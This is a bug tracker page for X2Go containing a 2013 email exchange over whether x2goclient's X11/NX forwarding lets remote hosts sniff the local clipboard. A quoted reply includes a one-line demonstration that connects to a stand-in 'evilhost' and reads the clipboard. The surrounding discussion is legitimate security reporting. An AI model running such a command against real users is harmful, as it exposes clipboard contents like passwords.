X2Go Bug report logs - #509
Document NX/X11 security issue: clipboard sniffing

Package: wiki.x2go.org; Maintainer for wiki.x2go.org is x2go-dev@lists.x2go.org;

Reported by: Christoph Anton Mitterer <calestyo@scientia.net>

Date: Mon, 1 Jul 2013 02:48:02 UTC

Severity: grave

Tags: security

Subject: Bug#258: [X2Go-Dev] Bug#258: SECURITY: x2goclient allows clipboard sniffing
Reply-To: Christoph Anton Mitterer <calestyo@scientia.net>, 258@bugs.x2go.org
Message-ID: <1372682609.25918.14.camel@heisenberg.scientia.net>
From: Christoph Anton Mitterer <calestyo@scientia.net>
To: 258@bugs.x2go.org
Date: Mon, 01 Jul 2013 14:43:29 +0200
In-Reply-To: <20130701114356.GP2447@cip.informatik.uni-erlangen.de>
References: <1372646308.18508.2.camel@heisenberg.scientia.net>
[Message part 1 (text/plain, inline)]
On Mon, 2013-07-01 at 13:43 +0200, Alexander Wuerstlein wrote: 
> Yes, other related tools like X11. x2go is basically just a faster
> version of the traditional xforwarding. In X11 every client can always
> access the clipboard/selection/etc., so you will also have the same
> security problems (by design). E.g. 'ssh -X user@evilhost "xclip -o"'
> demonstrates this.
Well but that "argument" doesn't really count:
1) Just because others do it plainly insecure, you cannot do it like
this as well... like as if Gentoo would say "if Debian breaks their
OpenSSL entropy, we should do so, too"... o.O

2) Literally no one who has a decent mind of security, will allow other
hosts to directly access their X server.. because then you're (security
wise) anyway screwed...
And I thought NX would secure what's sent from remote in order to not
be able to overtake the input/output devices of the hosts (whole)

> I disagree, this is not a hole at all, it works as intended. It's just
> that users are often not educated about the implications of passing
> around passwords via the clipboard etc.
Na I disagree... if even people would be educated (which is not
realistic) it will happen by accident, that you copy sensitive
information... sometimes other programs may do this even automatically
and you can't do anything against.

[smime.p7s (application/x-pkcs7-signature, attachment)]


X2Go Developers <owner@bugs.x2go.org>. Last modified: Fri Feb 3 14:26:16 2023; Machine Name: ymir.das-netzwerkteam.de
